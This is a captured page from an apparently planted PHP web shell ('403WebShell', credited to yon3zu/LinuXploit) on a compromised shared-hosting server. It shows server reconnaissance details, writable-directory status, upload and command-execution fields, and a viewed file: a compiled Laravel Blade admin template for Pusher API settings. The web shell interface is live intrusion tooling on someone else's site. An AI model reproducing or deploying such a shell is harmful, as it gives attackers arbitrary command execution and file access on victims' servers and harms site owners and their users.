Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 13.59.83.202
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/storage/framework/views/17ebab9b184fc97ece70549b62606ee93f4528a1.php
<?php if(is_default_lang()): ?>
    <hr>
    <div class="row">
        <div class="col-sm-4">
            <h3 class="form-group-title"><?php echo e(__('Config Broadcast')); ?></h3>
            <p class="form-group-desc"><?php echo e(__('Change your config broadcast site')); ?></p>
        </div>
        <div class="col-sm-8">
            <div class="panel">
                <div class="panel-title"><strong><?php echo e(__("Broadcast Driver")); ?></strong></div>
                <div class="panel-body">
                    <div class="form-group">
                        <div class="form-controls">
                            <select name="broadcast_driver" class="form-control">
                                <?php $__currentLoopData = \Modules\Core\SettingClass::BROADCAST_DRIVER; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $item=>$value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                    <option value="<?php echo e($value); ?>" <?php echo e(setting_item('broadcast_driver') == $value ? 'selected' : ''); ?>><?php echo e(__(strtoupper($value))); ?></option>
                                <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                            </select>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <hr>
    <div class="row">
        <div class="col-sm-4">
            <h3 class="form-group-title"><?php echo e(__('Pusher API')); ?></h3>
            <p class="form-group-desc"><?php echo e(__('Change your API for pusher here. It will use for chat plugin and notification')); ?></p>
        </div>
        <div class="col-sm-8">
            <div class="panel">
                <div class="panel-title"><strong><?php echo e(__("Pusher API Information")); ?></strong></div>
                <div class="panel-body">
                    <div class="form-group" >
                        <label><?php echo e(__('API KEY')); ?></label>
                        <div class="form-controls">
                            <input type="text" name="pusher_api_key" value="<?php echo e(setting_item('pusher_api_key')); ?>" class="form-control">

                        </div>
                    </div>
                    <div class="form-group" >
                        <label><?php echo e(__('API Secret')); ?></label>
                        <div class="form-controls">
                            <input type="text" name="pusher_api_secret" value="<?php echo e(setting_item('pusher_api_secret')); ?>" class="form-control">

                        </div>
                    </div>
                    <div class="form-group" >
                        <label><?php echo e(__('APP ID')); ?></label>
                        <div class="form-controls">
                            <input type="text" name="pusher_app_id" value="<?php echo e(setting_item('pusher_app_id')); ?>" class="form-control">

                        </div>
                    </div>
                    <div class="form-group" >
                        <label><?php echo e(__('Cluster')); ?></label>
                        <div class="form-controls">
                            <input type="text" name="pusher_cluster" value="<?php echo e(setting_item('pusher_cluster')); ?>" class="form-control">

                        </div>
                    </div>
                </div>
            </div>

        </div>
    </div>

<?php endif; ?>
<?php /**PATH /home/book24/public_html/modules/Core/Views/admin/settings/groups/parts/pusher.blade.php ENDPATH**/ ?>

Youez - 2016 - github.com/yon3zu
LinuXploit